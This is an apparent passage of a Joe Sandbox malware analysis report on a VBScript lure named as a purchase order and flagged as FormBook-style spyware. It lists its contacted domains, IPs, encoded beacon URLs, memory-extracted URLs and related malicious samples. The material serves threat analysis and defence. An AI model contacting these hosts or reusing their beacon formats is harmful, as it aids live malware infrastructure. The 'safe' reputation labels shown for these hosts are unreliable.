            http://www.northidahoscans.online/lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtV0%Avira URL Cloudsafe
            https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source0%Avira URL Cloudsafe
            http://www.allstary.top/83oq/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.brickhills.site
            		103.224.182.242
            		truefalse
              		unknown
              pin-ballerz.net
              		199.15.251.162
              		truefalse
                		unknown
                www.northidahoscans.online
                		208.91.197.27
                		truefalse
                  		unknown
                  www.allstary.top
                  		199.193.6.134
                  		truefalse
                    		unknown
                    www.waytoocool.life
                    		52.60.87.163
                    		truefalse
                      		unknown
                      just-do-public-0526-cpdhe.jiexi-010.top
                      		18.166.177.211
                      		truefalse
                        		unknown
                        www.timai.shop
                        		unknown
                        		unknownfalse
                          		unknown
                          www.pin-ballerz.net
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.pin-ballerz.net/ocjg/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.timai.shop/xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtVfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.pin-ballerz.net/ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtVfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtVfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.waytoocool.life/nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtVfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.waytoocool.life/nydx/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.brickhills.site/q6c0/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.timai.shop/xsla/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.northidahoscans.online/lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtVfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.allstary.top/83oq/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.allstary.top/83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtVfalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabchkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://park.101datacenter.net/images/vendor-1/google_workspace.pngchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourcechkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://dts.gnpge.comfirefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://park.101datacenter.net/images/vendor-1/trustpilot.svgchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=wachkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.northidahoscans.online/px.js?ch=1chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.northidahoscans.online/px.js?ch=2chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=waytoocool.life&utmchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cs.deviceatlas-cdn.com/101dacs.jschkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://park.101datacenter.net/images/vendor-1/icon/101domain.icochkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://park.101datacenter.net/css/vendor-1.css?20241209054434chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htmchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://park.101datacenter.net/images/vendor-1/google-reviews.svgchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_schkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.timai.shopJogKDBeJAc.exe, 00000007.00000002.3306103928.00000000055A4000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://park.101datacenter.net/images/vendor-1/com.pngchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.101domain.com/gmail_email_aliases.htmchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_schkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referrachkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://park.101datacenter.net/js/pricing.js?20241209054434chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://park.101datacenter.net/js/jquery-3.6.0.min.js?20241209054434chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://www.101domain.com/resource_center.htmchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cs.deviceatlas-cdn.com/smartclickchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.101domain.com/external_links.htmchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://park.101datacenter.net/css/fonts/LatoRegular.woff2chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cs.deviceatlas-cdn.comchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.ecosia.org/newtab/chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://park.101datacenter.netJogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://park.101datacenter.net/css/fonts/LatoRegular.woff)chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMopJogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003686000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-pagchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://park.101datacenter.net/images/vendor-1/park-back.jpgchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://park.101datacenter.net/css/fonts/LatoRegular.woff2)chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.northidahoscans.online/sk-logabpstatus.php?a=L2g4bEdyRU15NHN0SHVwVWZwYVdjU3FNL0laQndpc0czchkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://park.101datacenter.net/js/modernizr-webp.js?20241209054434chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://park.101datacenter.net/images/vendor-1/park-back.webpJogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://park.101datacenter.net/images/vendor-1/101domain-logo.svgchkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourcechkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                52.60.87.163
                                                		www.waytoocool.lifeUnited States
                                                		16509AMAZON-02USfalse
                                                199.15.251.162
                                                		pin-ballerz.netUnited States
                                                		29713ELIA-60USfalse
                                                103.224.182.242
                                                		www.brickhills.siteAustralia
                                                		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                208.91.197.27
                                                		www.northidahoscans.onlineVirgin Islands (BRITISH)
                                                		40034CONFLUENCE-NETWORK-INCVGfalse
                                                18.166.177.211
                                                		just-do-public-0526-cpdhe.jiexi-010.topUnited States
                                                		16509AMAZON-02USfalse
                                                199.193.6.134
                                                		www.allstary.topUnited States
                                                		22612NAMECHEAP-NETUSfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1576423
                                                Start date and time:2024-12-17 03:39:19 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 59s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PO1341489LTB GROUP.vbs
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winVBS@9/3@8/6
                                                Cookbook Comments:
                                                • Found application associated with file extension: .vbs

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                21:41:15API Interceptor2057408x Sleep call for process: chkntfs.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                52.60.87.163Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.carpentry.club/jcsf/
                                                DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                                • www.wooden.fyi/4uk7/
                                                rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                • www.wooden.fyi/pbn5/
                                                factura.exeGet hashmaliciousFormBookBrowse
                                                • www.maxwellfi.com/qpcj/?PCKydxRp=k1F4usNRs9w5dz0wAa964se4ihH6gHXdfU6/O1ysPWDfP/qFmRAFS+OwiNWCh/2BLbWGmfjspirmV8iPAz+9fIHaNxAvxp6JH6sRoW95ASBz&IVD=vTEpW4TmB
                                                TT_Swift_Copy.xlsGet hashmaliciousFormBookBrowse
                                                • www.lumira.skin/jk56/?qL3=bZcaCVevz/CjjxBpqnizh9EdlHqjRopABUyYNuq7Kb2Q3s66myV4rbXDrSssKtCWBri7iw==&O0DHn6=YxoDu0HP7V
                                                CV.docGet hashmaliciousFormBookBrowse
                                                • www.prospin.click/mg0g/?G2=AMo+Cmk3hXK3yH/KQRdEfavaLWFie8ehN2HIFp6MhDBnwy4mJAPROf6TTmmTOHloXs1NFvilG7N23QG/W1CKoVDkvkIXGEGyBHUKE88=&dz=ovClIV4H5
                                                aj4Q8yG6NG.exeGet hashmaliciousFormBookBrowse
                                                • www.prospin.click/rkvi/?rj3XCz4=ka5t9vYsEa2dr4K2psPjUXh1Ra65uMYal7PUsn+KKItd8MVsuIfw0p+4swlTbNS7nPhbZlTMHB/SQ2+aogP+A16r87RCNzyTpbvX4KqvzpkI&JbGlt=QRYxF2K8g8
                                                BvUGO4AmpJ.exeGet hashmaliciousFormBookBrowse
                                                • www.prospin.click/mg0g/?dHQDe=AMo+Cmk3hXK3yH/JIQszer/7BzcWKv2hN2HIFp6MhDBnwy4mJAPRIbvCWXWUJFNoQc05PPq8C6BqngWJWVPrm17vgxUSQX3Bdg==&v4hPP=RVbDcXjXqxFT0x5p
                                                GdqrlAmE3T.exeGet hashmaliciousFormBookBrowse
                                                • www.prospin.click/mg0g/?wPJpe=AMo+Cmk3hXK3yH/JIQszer/7BzcWKv2hN2HIFp6MhDBnwy4mJAPRIbvCWXWUJFNoQc05PPq8C6BqngWJWVProV6hkxEPSlfBXil9aYBpEsBh&svR=k4YlqJ20X2XXs
                                                Tr71jqZGPq.exeGet hashmaliciousFormBookBrowse
                                                • www.prospin.click/mg0g/
                                                103.224.182.242PO2412010.exeGet hashmaliciousFormBookBrowse
                                                • www.madhf.tech/6ou6/
                                                Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs
                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                • www.brickhills.site/vwn2/
                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                • www.madhf.tech/6ou6/
                                                Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                • www.madhf.tech/6ou6/
                                                attached invoice.exeGet hashmaliciousFormBookBrowse
                                                • www.seeseye.website/ebz6/
                                                YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                • www.madhf.tech/0mwe/
                                                Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                • www.madhf.tech/3iym/
                                                Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.madhf.tech/6ou6/
                                                Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.madhf.tech/6ou6/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                www.allstary.topPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                • 199.193.6.134
                                                www.brickhills.sitePp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                • 103.224.182.242

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AMAZON-02USdrivers.exeGet hashmaliciousUnknownBrowse
                                                • 52.95.161.62
                                                GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                • 52.95.160.45
                                                drivers.exeGet hashmaliciousUnknownBrowse
                                                • 3.5.237.31
                                                wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                • 52.32.94.97
                                                z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                • 18.143.155.63
                                                wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                • 52.39.197.120
                                                la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 54.171.230.55
                                                https://afg.acemlnb.com/lt.php?x=3TZy~GE3UnGZEpJA-w9HgOSc2K2ji_L0wu1gjqXGIXSh587-zEy.zuJr1Y2iitE~judAXHPHJeTMHaWtOdxFVOFx23MoiNDGet hashmaliciousUnknownBrowse
                                                • 52.210.174.128
                                                http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                • 52.11.244.148
                                                Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                • 205.251.222.35
                                                TRELLIAN-AS-APTrellianPtyLimitedAUhttp://www.firsthealthbp.comGet hashmaliciousUnknownBrowse
                                                • 103.224.212.254
